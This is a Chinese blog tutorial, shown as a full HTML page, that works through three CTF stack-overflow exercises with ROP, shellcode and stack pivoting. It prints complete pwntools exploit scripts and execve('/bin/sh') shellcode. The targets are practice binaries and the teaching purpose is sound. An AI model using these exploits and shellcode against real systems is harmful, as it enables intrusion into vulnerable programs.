<!DOCTYPE html>
<html lang="en">
<head><meta name="generator" content="Hexo 3.8.0">

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no">
<meta name="author" content="Gonglong Chen">



<meta name="description" content="前言上回说到，如何利用程序中system函数以及bin/sh字符串来进行pwn。这里我们会介绍，如何在栈可执行而system函数以及参数没有的情况下，如何自己布置payload进行pwn。此外，还提供了一份可以参考的pwn套路，套路熟悉了，即可慢慢转化为熟悉。故此名曰：入门到熟练（二）。 练习题参考（利用库函数读取参数）所谓的入门到熟练，套路还是要有的。套路有了，就可以见招拆招。我们一步一步来。拿">
<meta name="keywords" content="linux-pwn,ret2libc,stack pivoting">
<meta property="og:type" content="article">
<meta property="og:title" content="Linux pwn从入门到熟练（二）">
<meta property="og:url" content="http://yoursite.com/2018/12/24/linux-pwn-2/index.html">
<meta property="og:site_name" content="Gonglong Chen">
<meta property="og:description" content="前言上回说到，如何利用程序中system函数以及bin/sh字符串来进行pwn。这里我们会介绍，如何在栈可执行而system函数以及参数没有的情况下，如何自己布置payload进行pwn。此外，还提供了一份可以参考的pwn套路，套路熟悉了，即可慢慢转化为熟悉。故此名曰：入门到熟练（二）。 练习题参考（利用库函数读取参数）所谓的入门到熟练，套路还是要有的。套路有了，就可以见招拆招。我们一步一步来。拿">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://p0.ssl.qhimg.com/t01f8b5bc18e39f93c7.png">
<meta property="og:image" content="https://p1.ssl.qhimg.com/t014d94fc90e8ce8cea.png">
<meta property="og:image" content="https://p0.ssl.qhimg.com/t0167c02bcc6dbf90e6.png">
<meta property="og:image" content="https://p4.ssl.qhimg.com/t017968c196596776d0.png">
<meta property="og:image" content="https://p4.ssl.qhimg.com/t01288ba56dd36b995f.png">
<meta property="og:image" content="https://p5.ssl.qhimg.com/t017a6718f692b766fa.png">
<meta property="og:image" content="https://p1.ssl.qhimg.com/t018a4afb837304a376.png">
<meta property="og:image" content="https://p2.ssl.qhimg.com/t016b308f80ec6901b4.png">
<meta property="og:image" content="https://p1.ssl.qhimg.com/t01056910f70d292495.png">
<meta property="og:image" content="https://p2.ssl.qhimg.com/t0114aaf4e471689ae0.png">
<meta property="og:image" content="https://p2.ssl.qhimg.com/t01360d2ba3379b64b1.png">
<meta property="og:image" content="https://p1.ssl.qhimg.com/t019698e0c6c9cf851f.png">
<meta property="og:image" content="https://p3.ssl.qhimg.com/t01b62400cb53319c0a.png">
<meta property="og:image" content="https://p1.ssl.qhimg.com/t01e0f313dd79878e65.png">
<meta property="og:image" content="https://p1.ssl.qhimg.com/t016ededdc1521f063d.png">
<meta property="og:image" content="https://p5.ssl.qhimg.com/t01e2b7c1e1f2074dd7.png">
<meta property="og:image" content="https://p3.ssl.qhimg.com/t011d3d70f9f4613bf3.png">
<meta property="og:image" content="https://p2.ssl.qhimg.com/t01175d7da88713df4b.png">
<meta property="og:updated_time" content="2020-08-15T01:28:56.393Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Linux pwn从入门到熟练（二）">
<meta name="twitter:description" content="前言上回说到，如何利用程序中system函数以及bin/sh字符串来进行pwn。这里我们会介绍，如何在栈可执行而system函数以及参数没有的情况下，如何自己布置payload进行pwn。此外，还提供了一份可以参考的pwn套路，套路熟悉了，即可慢慢转化为熟悉。故此名曰：入门到熟练（二）。 练习题参考（利用库函数读取参数）所谓的入门到熟练，套路还是要有的。套路有了，就可以见招拆招。我们一步一步来。拿">
<meta name="twitter:image" content="https://p0.ssl.qhimg.com/t01f8b5bc18e39f93c7.png">

<link rel="apple-touch-icon" href="/apple-touch-icon.png">


    <link rel="alternate" href="/atom.xml" title="Gonglong Chen" type="application/atom+xml">



    <link rel="shortcut icon" href="/favicon.png">





    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">


<link rel="stylesheet" href="/css/style.css">





<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>Linux pwn从入门到熟练（二） | Gonglong Chen</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: false,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: true
    }
</script>


    <script> yiliaConfig.jquery_ui = [false]; </script>



    <script> yiliaConfig.rootUrl = "\/";</script>







  <!--prettify代码高亮主题css引入-->
  <link href="/plugins/prettify/themes/atelier-lakeside-dark.css" rel="stylesheet">



</head></html>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/img/head.jpg" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/">Gonglong Chen</a></h1>
        </hgroup>

        

        
            <form id="search-form">
            <input type="text" id="local-search-input" name="q" placeholder="search..." class="search form-control" autocomplete="off" autocorrect="off" searchonload="">
            <i class="fa fa-times" onclick="resetSearch()"></i>
            </form>
            <div id="local-search-result"></div>
            <p class="no-result">No results found <i class="fa fa-spinner fa-pulse"></i></p>
        


        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/archives/">blogs</a></li>
                        
                            <li><a href="/tags/">Tages</a></li>
                        
                            <li><a href="/about/">Aboutme</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa 新浪微博" href="https://weibo.com/u/2618063075" title="新浪微博"></a>
                            
                                <a class="fa GitHub" href="https://github.com/desword" title="GitHub"></a>
                            
                                <a class="fa anquank" href="https://www.anquanke.com/member/122056" title="anquank"></a>
                            
                                <a class="fa CSDN" href="https://blog.csdn.net/ls1160" title="CSDN"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                
                

                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页">Gonglong Chen</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/img/head.jpg" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页">Gonglong Chen</a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/archives/">blogs</a></li>
                
                    <li><a href="/tags/">Tages</a></li>
                
                    <li><a href="/about/">Aboutme</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa 新浪微博" target="_blank" href="https://weibo.com/u/2618063075" title="新浪微博"></a>
                            
                                <a class="fa GitHub" target="_blank" href="https://github.com/desword" title="GitHub"></a>
                            
                                <a class="fa anquank" target="_blank" href="https://www.anquanke.com/member/122056" title="anquank"></a>
                            
                                <a class="fa CSDN" target="_blank" href="https://blog.csdn.net/ls1160" title="CSDN"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="Tags" friends="Friends" about="About Me">
</nav>
      <div class="body-wrap"><article id="post-linux-pwn-2" class="article article-type-post" itemscope="" itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2018/12/24/linux-pwn-2/" class="article-date">
      <time datetime="2018-12-23T17:52:19.000Z" itemprop="datePublished">2018-12-24</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Linux pwn从入门到熟练（二）
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/linux-pwn/">linux-pwn</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ret2libc/">ret2libc</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/stack-pivoting/">stack pivoting</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>上回说到，如何利用程序中system函数以及bin/sh字符串来进行pwn。这里我们会介绍，如何在栈可执行而system函数以及参数没有的情况下，如何自己布置payload进行pwn。此外，还提供了一份可以参考的pwn套路，套路熟悉了，即可慢慢转化为熟悉。故此名曰：入门到熟练（二）。</p>
<h1 id="练习题参考（利用库函数读取参数）"><a href="#练习题参考（利用库函数读取参数）" class="headerlink" title="练习题参考（利用库函数读取参数）"></a>练习题参考（利用库函数读取参数）</h1><p>所谓的入门到熟练，套路还是要有的。套路有了，就可以见招拆招。我们一步一步来。<br>拿到题，我们需要依次查看：</p>
<ol>
<li>检查保护情况</li>
<li>判断漏洞函数，如gets,scanf等</li>
<li>计算目标变量的在堆栈中距离ebp的偏移</li>
<li>分析是否已经载入了可以利用的函数，如system，execve等</li>
<li>分析是否有字符串/bin/sh</li>
</ol>
<p><a href="https://github.com/desword/pwn_execrise/raw/master/pwn_basic_rop/pwn4" target="_blank" rel="noopener">Pwn4</a>题目地址。</p>
<h2 id="第一步，保护情况，"><a href="#第一步，保护情况，" class="headerlink" title="第一步，保护情况，"></a>第一步，保护情况，</h2><p>发现堆栈不可以执行，其他到还好。那么，我们在溢出时就需要再堆栈中部署的具有功能的地址，而不是具体的代码了。理解成堆栈中需要布置路线图，之后的程序按照这个路线图来执行。<br>反之，如果堆栈可以执行，我们就要思考如何布置shellcode，如何优化shellcode长度以及删除坏字符。（将在下一题的时候介绍）<br><img src="https://p0.ssl.qhimg.com/t01f8b5bc18e39f93c7.png" alt=""></p>
<h2 id="第二步，检测漏洞函数。"><a href="#第二步，检测漏洞函数。" class="headerlink" title="第二步，检测漏洞函数。"></a>第二步，检测漏洞函数。</h2><p>发现是gets。这里分享一个ctf-pwn-tips，里面总结了很多的存在漏洞的函数，以及输入参数的描述，非常实用。<a href="https://github.com/Naetw/CTF-pwn-tips" target="_blank" rel="noopener">TIPS</a></p>
<p><img src="https://p1.ssl.qhimg.com/t014d94fc90e8ce8cea.png" alt=""></p>
<h2 id="第三步，确认偏移量。"><a href="#第三步，确认偏移量。" class="headerlink" title="第三步，确认偏移量。"></a>第三步，确认偏移量。</h2><p>有几种方式。</p>
<p><img src="https://p0.ssl.qhimg.com/t0167c02bcc6dbf90e6.png" alt=""></p>
<p>我们可以直接从IDA的代码中分析出来，参数距离EBP的位置。如上述，看到距离ebp是0x64（100）个的字节，那么距离存放返回地址的偏移就是100+4=104个字节。但是，IDA的分析并不都是准确的，真正准确的位置，还是需要我们手动去调试。具体方法参考<a href="https://www.anquanke.com/post/id/164530" target="_blank" rel="noopener">Linux PWN从入门到熟练</a>。这里简单整理一下步骤（假设linux程序在虚拟机guest执行，IDA在主机host执行）：</p>
<ol>
<li>拷贝linux_server到guest的程序目录，并执行；</li>
<li>IDA设置远程调试，并设置正确的guest IP和端口；</li>
<li>IDA设置程序的断点在return，可以方便查看寄存器；</li>
<li>运行程序；</li>
<li>用脚本patternLocOffset.py创建偏移测试字符串，700字节度比如；</li>
<li>将产生的字符串在guest中输入；</li>
<li>查看host中IDA的ebp字符串；</li>
<li>在patternLocOffset.py中计算偏移</li>
</ol>
<p>最终应该可以看到下面类似的结果。</p>
<p><img src="https://p4.ssl.qhimg.com/t017968c196596776d0.png" alt=""></p>
<pre><code>$ python patternLocOffset.py -l 700 -s 0x41366441
[*] Create pattern string contains 700 characters ok!
[*] No exact matches, looking for likely candidates...
[+] Possible match at offset 108 (adjusted another-endian)
[+] take time: 0.0004 s
</code></pre><p>发现实际的偏移是108个字节，覆盖点距离ebp。那么距离返回地址就应该是108+4=112字节。可见，IDA的分析有时是不准的，需要自己去测量。</p>
<h2 id="第四步，分析可以利用的函数，"><a href="#第四步，分析可以利用的函数，" class="headerlink" title="第四步，分析可以利用的函数，"></a>第四步，分析可以利用的函数，</h2><p>发现有system的：<br><img src="https://p4.ssl.qhimg.com/t01288ba56dd36b995f.png" alt=""></p>
<h2 id="第五步-查找是否有系统调用字符串："><a href="#第五步-查找是否有系统调用字符串：" class="headerlink" title="第五步,查找是否有系统调用字符串："></a>第五步,查找是否有系统调用字符串：</h2><pre><code>ROPgadget --binary ret2libc2 --string &quot;/bin/sh&quot;
Strings information
============================================================
</code></pre><p>发现并没有字符串了，因此这里我们需要想个办法。<br>直观的想法是在shellcode中，在参数的位置直接放入字符串“/bin/sh”，比如下面这样：</p>
<pre><code>payload = flat([&#39;a&#39; * 112, system_plt, 0xabcdabcd, “/bin/sh”])
</code></pre><p>但是正如我们前面所说，放在堆栈中的是程序执行的路线图，而不是实际的程序或者字符串，因此，按照上述方式放置字符串，system并不会读取”/bin/sh”，而是读取”/bin/sh”对应的4个字节的地址所指向的内存空间，这个空间明显是不合法，因此就会导致利用失败。</p>
<p>怎么办呢？我们发现程序中还载入了函数gets，那么我们可以利用gets来读取用户输入的”/bin/sh”放置到某个地址空间去，接着system再调用它。“某个地址空间”可以是下面的buf2，可以发现它的地址是0x0804A080。这个空间可以让我们使用（感觉明显是CTF题留出来的位置= =）<br><img src="https://p5.ssl.qhimg.com/t017a6718f692b766fa.png" alt=""></p>
<p>那么，我们的exp可以按照下面的方式安排：</p>
<pre><code>##!/usr/bin/env python
from pwn import *

sh = process(&#39;./pwn4&#39;)
shelf = ELF(&#39;./pwn4&#39;)

gets_plt = shelf.plt[&#39;gets&#39;]
system_plt = shelf.plt[&#39;system&#39;]
pop_ebp = 0x0804872f
buf2 = 0x804a080
payload = flat(
[&#39;a&#39; * 112, gets_plt, pop_ebp, buf2, system_plt, 0xabcdabcd, buf2])

sh.sendline(payload)
sh.sendline(&#39;/bin/sh&#39;)
sh.interactive()
</code></pre><p>其中关键的代码是：</p>
<pre><code>payload = flat(
[&#39;a&#39; * 112, gets_plt, pop_ebp, buf2, system_plt, 0xabcdabcd, buf2])
</code></pre><p>相信有的朋友会不明白，为啥有个[gets_plt, pop_ebp, buf2]，这样的payload布置。Pop_ebp的主要目的是让eip流向system的位置，并且取出system地址赋值给eip。</p>
<p>Pop_ebp其实不一定是pop ebp，pop任何其他的寄存器都可以，主要是利用该指令的esp+4的功能。比如，我们可以找到如下的位置，其中0x0804872f，0x0804843d都可以让它esp+4操作一次就好，操作多了就流的多了，就不指向system地址了，注意我们这里还要求得要返回ret一下，这样才会实际的提取system的地址出来，赋值给eip：</p>
<pre><code>@ubuntu:~/ $ ROPgadget --binary pwn4 --only &#39;pop|ret&#39;
Gadgets information
============================================================
0x0804872f : pop ebp ; ret
0x0804872c : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x0804843d : pop ebx ; ret
0x0804872e : pop edi ; pop ebp ; ret
0x0804872d : pop esi ; pop edi ; pop ebp ; ret
0x08048426 : ret
0x0804857e : ret 0xeac1

Unique gadgets found: 7
</code></pre><p>未来更清楚一些，画了一个图，其中序号的顺序表示，对应的命令执行完之后，esp对应的位置。</p>
<p><img src="https://p1.ssl.qhimg.com/t018a4afb837304a376.png" alt=""></p>
<h1 id="第一题（堆栈直接执行shellcode）"><a href="#第一题（堆栈直接执行shellcode）" class="headerlink" title="第一题（堆栈直接执行shellcode）"></a>第一题（堆栈直接执行shellcode）</h1><p>接下来这题，我们再轻松一点，可以直接在堆栈中执行程序。</p>
<p><a href="https://github.com/desword/pwn_execrise/raw/master/pwn_basic_rop_2/ pwn5" target="_blank" rel="noopener">pwn5</a></p>
<p>继续前面的套路。</p>
<h2 id="第一步，查看保护"><a href="#第一步，查看保护" class="headerlink" title="第一步，查看保护"></a>第一步，查看保护</h2><p><img src="https://p2.ssl.qhimg.com/t016b308f80ec6901b4.png" alt=""><br>发现，可以直接在堆栈上执行程序了，开启的是PIE，地址随机化的保护。</p>
<h2 id="第二步，判断漏洞函数。"><a href="#第二步，判断漏洞函数。" class="headerlink" title="第二步，判断漏洞函数。"></a>第二步，判断漏洞函数。</h2><p><img src="https://p1.ssl.qhimg.com/t01056910f70d292495.png" alt=""></p>
<p>发现函数是read，仅仅读取0x40（64）个字节。</p>
<h2 id="第三步，计算目标变量的在堆栈中距离ebp的偏移"><a href="#第三步，计算目标变量的在堆栈中距离ebp的偏移" class="headerlink" title="第三步，计算目标变量的在堆栈中距离ebp的偏移"></a>第三步，计算目标变量的在堆栈中距离ebp的偏移</h2><p><img src="https://p2.ssl.qhimg.com/t0114aaf4e471689ae0.png" alt=""><br>EBP的内容为：0x3761413661413561</p>
<pre><code>$ python patternLocOffset.py -l 700 -s 0x3761413661413561
[*] Create pattern string contains 700 characters ok!
[*] No exact matches, looking for likely candidates...
[+] Possible match at offset 16 (adjusted another-endian)
[+] take time: 0.0005 s
</code></pre><p>距离EBP的偏移是16个字节，距离存放的返回地址是16+8=24个字节。<br>这里可以发现IDA分析的又是正确的了，0x10个字节。</p>
<h2 id="第四步和第五步，分析是否已经载入了可以利用的函数，"><a href="#第四步和第五步，分析是否已经载入了可以利用的函数，" class="headerlink" title="第四步和第五步，分析是否已经载入了可以利用的函数，"></a>第四步和第五步，分析是否已经载入了可以利用的函数，</h2><p>如system，execve等<br>发现，并没有上述函数。但是由于堆栈可以执行，因此我们可以考虑直接将shellcode阻止在payload里面。因此，这里和第五步分析是否有字符串/bin/sh合并了，我们可以自己放置字符串，并且调用对应的地址了。<br><img src="https://p2.ssl.qhimg.com/t01360d2ba3379b64b1.png" alt=""></p>
<p>理论上，我们可以直接利用pwntools产生的shellcode来进行部署，但是这道题有点特殊。在返回地址之后所剩余的空间=64-24-8=32个字节（返回地址还要占用8个字节），因此实际部署shellcode的长度还剩下32个字节，使用pwntools产生的shellcode有44个字节，太长了。因此，我们可以从网上找到更短的shellcode：</p>
<pre><code># 23 bytes
# https://www.exploit-db.com/exploits/36858/
shellcode_x64 = &quot;\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05&quot;
</code></pre><p>它的汇编形式是</p>
<pre><code># char *const argv[]
xorl %esi, %esi
# &#39;h&#39; &#39;s&#39; &#39;/&#39; &#39;/&#39; &#39;n&#39; &#39;i&#39; &#39;b&#39; &#39;/&#39;
movq $0x68732f2f6e69622f, %rbx
# for &#39;\x00&#39;
pushq %rsi
pushq %rbx
pushq %rsp
# const char *filename
popq %rdi
# __NR_execve 59
pushq $59
popq %rax
# char *const envp[]
xorl %edx, %edx
syscall
</code></pre><p>好了，shellcode确定好了，我们现在还有一个问题。Shellcode执行的地址如何确定呢？shellcode的地址，其实就是buf的地址加上32个字节的偏移。</p>
<p>我们前面发现，该程序是动态改变地址的，因此静态的确认buf地址是不可行的，进而静态的确认shellcode的地址是不可行的。<br>处理到这里好像有点死胡同了，我们发现程序中有printf函数，理论上可以利用它来打印buf的地址，然后实时的计算buf+32的地址，就能够得到shellcode的地址。但是，我们回头看看程序本身的执行，会发现：<br><img src="https://p1.ssl.qhimg.com/t019698e0c6c9cf851f.png" alt=""></p>
<p><img src="https://p3.ssl.qhimg.com/t01b62400cb53319c0a.png" alt=""></p>
<p>它实际上已经为我们解决了这个问题，自己输出了buf的地址（= = CTF题目的难易程度真的是微妙之间呀）</p>
<p>那么，我们的exp思路就是： 实时读取buf的地址，计算buf+32得到shellcode的地址，放置在payload中。</p>
<pre><code>from pwn import *
code = ELF(&#39;./pwn5&#39;)

# 23 bytes
# https://www.exploit-db.com/exploits/36858/
shellcode_x64 = &quot;\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05&quot;
sh.recvuntil(&#39;[&#39;)
buf_addr = sh.recvuntil(&#39;]&#39;, drop=True)
buf_addr = int(buf_addr, 16)
payload = &#39;b&#39; * 24 + p64(buf_addr + 32) + shellcode_x64
sh.sendline(payload)
sh.interactive()
</code></pre><p>堆栈的布置图，以及地址的相对位置，以buf为起点。</p>
<p><img src="https://p1.ssl.qhimg.com/t01e0f313dd79878e65.png" alt=""></p>
<h1 id="第二题（控制esp进行精准打击）"><a href="#第二题（控制esp进行精准打击）" class="headerlink" title="第二题（控制esp进行精准打击）"></a>第二题（控制esp进行精准打击）</h1><p>接下来，我们来点有难度的。在这个程序中，我们的payload实在放不下了，即使是23字节，那么怎么办呢？</p>
<p><a href="https://github.com/desword/pwn_execrise/raw/master/pwn_basic_rop_2/pwn6" target="_blank" rel="noopener">pwn6</a></p>
<p>继续前面的过程：</p>
<h2 id="第一步：检测保护情况"><a href="#第一步：检测保护情况" class="headerlink" title="第一步：检测保护情况"></a>第一步：检测保护情况</h2><p><img src="https://p1.ssl.qhimg.com/t016ededdc1521f063d.png" alt=""><br>发现，是个三无程序。么有任何保护，看起来很简单？哈哈，并没有。看官请继续。</p>
<h2 id="第二步，判断漏洞函数，"><a href="#第二步，判断漏洞函数，" class="headerlink" title="第二步，判断漏洞函数，"></a>第二步，判断漏洞函数，</h2><p>如gets,scanf等</p>
<p><img src="https://p5.ssl.qhimg.com/t01e2b7c1e1f2074dd7.png" alt=""></p>
<p>发现是fgets函数，仅仅读取50个字节的字符长度。</p>
<h2 id="第三步，"><a href="#第三步，" class="headerlink" title="第三步，"></a>第三步，</h2><p>计算目标变量的在堆栈中距离ebp的偏移。<br>方法和前面类似，发现偏移距离ebp是0x20，那么距离ret_addr就是0x20+4=0x24（36）字节了。</p>
<h2 id="第四步和第五步："><a href="#第四步和第五步：" class="headerlink" title="第四步和第五步："></a>第四步和第五步：</h2><p>分析是否已经载入了可以利用的函数。发现并没有<br><img src="https://p3.ssl.qhimg.com/t011d3d70f9f4613bf3.png" alt=""></p>
<pre><code>$ ROPgadget --binary stack_pivoting_1 --string &#39;/bin/sh&#39;
Strings information
============================================================
</code></pre><p>字符串自然也是没有的。<br>我们考虑利用shellcode，好像可以类似于上一题的操作了。但是并不能，留给我们布置shellcode的长度为50-36-4=10字节（同样有4个字节的返回地址存放）！尴尬不==，放两个地址就没有位置了。但如果你能够厉害到用10个字节做shellcode，请大胆分享出来！</p>
<p>那么怎么办呢？<br>既然，堆栈溢出的位置不行了，那么我们就把shellcode放在栈里面吧！因为堆栈具有可执行的权限，因此这样完全是可行的。</p>
<p>这里，我先放图出来解释一下思路：</p>
<p><img src="https://p2.ssl.qhimg.com/t01175d7da88713df4b.png" alt=""></p>
<p>我们这样就总共有0x20（36个字节）的位置存放shellcode的了，顿时感觉找到了新出路。但是，要做到跳转到放置shellcode的位置，似乎并没有那么简单。要达到这个目的，我们需要做到以下几件事情：</p>
<ol>
<li>推算shellcode放置的地址</li>
<li>跳转到shellcode放置的位置</li>
</ol>
<p>首先，第一点，shellcode的位置就是发射payload的时候esp_old的位置，我们可以推算出来，当程序提取完返回地址之后，esp指向的地址距离esp_old的地址为0x20+4(ebp)+4(ret_addr)=0x28。因此，我们需要用当前的esp-0x28，得到的就是shellcode的地址。</p>
<p>对于第二点，我们如何让eip顺利的依次取出我们设计好的路线图呢？在ret_addr，我们需要寻找到一个gadget，它能够跳转到esp的位置，以继续往后执行栈上的代码。注意，这里我们为什么不直接将可执行的代码布置在ret_addr的位置，因为这里是原本的函数提取返回函数地址的地方，它并不会执行这里位置的代码，而是执行这个位置的内容指向的地址的代码。我们需要jmp esp这个操作，来让程序流获得在栈上执行的先河。</p>
<pre><code>$ ROPgadget --binary stack_pivoting_1 --only &#39;jmp|ret&#39; | grep &#39;esp&#39;
0x08048504 : jmp esp
</code></pre><p>发现只有这么一个地址。0x08048504。这也正是图中的位置。注意，当我们取出ret_addr里面的地址的时候，esp已经+4了，因此就会指向我们的下一步操作：跳转回esp_old的位置。</p>
<p>在这里，我们直接可以选择让pwntools产生可执行的代码”sub  esp 0x28; jmp esp”。注意，这里可以是直接运行的代码，因为我们的程序已经开始在栈上执行了，而不再是取出地址了。</p>
<p>最后的EXP按照下面这样布置：</p>
<pre><code>from pwn import *

sh = process(&#39;./pwn6&#39;)

shellcode_x86 = &quot;\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73&quot;
shellcode_x86 += &quot;\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0&quot;
shellcode_x86 += &quot;\x0b\xcd\x80&quot;

sub_esp_jmp = asm(&#39;sub esp, 0x28;jmp esp&#39;)
jmp_esp = 0x08048504
payload = shellcode_x86 + (
    0x20 - len(shellcode_x86)) * &#39;b&#39; + &#39;bbbb&#39; + p32(jmp_esp) + sub_esp_jmp
sh.sendline(payload)
sh.interactive()
</code></pre><p>注意，这里我们又启用了另外一段代码：<br>它更加短，只有21个字节。Shellcode越短是越好的。它的汇编对应如下：</p>
<pre><code>shellcode_x86 = &quot;\x31\xc9”                  # xor    ecx, ecx
shellcode_x86 += “\xf7\xe1”            # mul    ecx
shellcode_x86 += “\x51”            # push   ecx
shellcode_x86 += &quot;\x68\x2f\x2f\x73\x68&quot;  # push 0x68732f2f
shellcode_x86 += &quot;\x68\x2f\x62\x69\x6e&quot;  # push 0x6e69622f    
shellcode_x86 += “\x89\xe3”            # mov    ebx, esp
shellcode_x86 += “\xb0\x0b”            # mov    al, 0xb
shellcode_x86 += &quot;\xcd\x80&quot;        # int    0x80
</code></pre><h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>最后，再次给大家留下练习题。<br><a href="https://github.com/desword/pwn_execrise/raw/master/pwn_basic_rop_2/pwn7" target="_blank" rel="noopener">pwn7</a></p>
<p>给大家一个小tips，32位和64位程序的调试，一般的处理方式是准备两个虚拟机。但是这样操作太麻烦了，而且pwntools在32位下面经常无法正常工作。怎么办呢？理论上64位ubuntu是可以运行32位程序的，但是需要相关的库函数安装。使用下面的命令安装就好（<a href="https://blog.csdn.net/kingroc/article/details/51143327" target="_blank" rel="noopener">参考</a>）：</p>
<pre><code>sudo dpkg --add-architecture i386
sudo apt-get update
sudo apt-get install zlib1g:i386 libstdc++6:i386 libc6:i386
</code></pre><p>如果是比较老的版本，可以用下面的命令：</p>
<pre><code>sudo apt-get install ia32-libs
</code></pre><p>本文首发于安全客：<a href="https://www.anquanke.com/post/id/168468" target="_blank" rel="noopener">https://www.anquanke.com/post/id/168468</a></p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>Title:</span><a href="/2018/12/24/linux-pwn-2/">Linux pwn从入门到熟练（二）</a></p>
        <p><span>Author:</span><a href="/" title="Back to Homepage">Gonglong Chen</a></p>
        <p><span>Created:</span>2018-12-24, 01:52:19</p>
        <p><span>Updated:</span>2020-08-15, 09:28:56</p>
        <p>
            <span>Full URL:</span><a class="post-url" href="/2018/12/24/linux-pwn-2/" title="Linux pwn从入门到熟练（二）">http://yoursite.com/2018/12/24/linux-pwn-2/</a>
            <span class="copy-path" data-clipboard-text="From http://yoursite.com/2018/12/24/linux-pwn-2/　　By Gonglong Chen" title="Copy Article&#39;s Link &amp; Author"><i class="fa fa-clipboard"></i></span>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>License:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target="_blank">"CC BY-NC-SA 4.0"</a> Keep Link &amp; Author if Distribute.
        </p>
    </div>



    <nav id="article-nav">
        
            <div id="article-nav-newer" class="article-nav-title">
                <a href="/2019/05/22/lora-error-packet-modify/">
                    修改某款lora固件库以支持接收错误数据包
                </a>
            </div>
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2018/11/18/linx-pwn-basic-rop/">
                    Linux PWN从入门到熟练
                </a>
            </div>
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">Contents</strong>
        
            <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#练习题参考（利用库函数读取参数）"><span class="toc-number">2.</span> <span class="toc-text">练习题参考（利用库函数读取参数）</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#第一步，保护情况，"><span class="toc-number">2.1.</span> <span class="toc-text">第一步，保护情况，</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第二步，检测漏洞函数。"><span class="toc-number">2.2.</span> <span class="toc-text">第二步，检测漏洞函数。</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第三步，确认偏移量。"><span class="toc-number">2.3.</span> <span class="toc-text">第三步，确认偏移量。</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第四步，分析可以利用的函数，"><span class="toc-number">2.4.</span> <span class="toc-text">第四步，分析可以利用的函数，</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#第五步-查找是否有系统调用字符串："><span class="toc-number">2.5.</span> <span 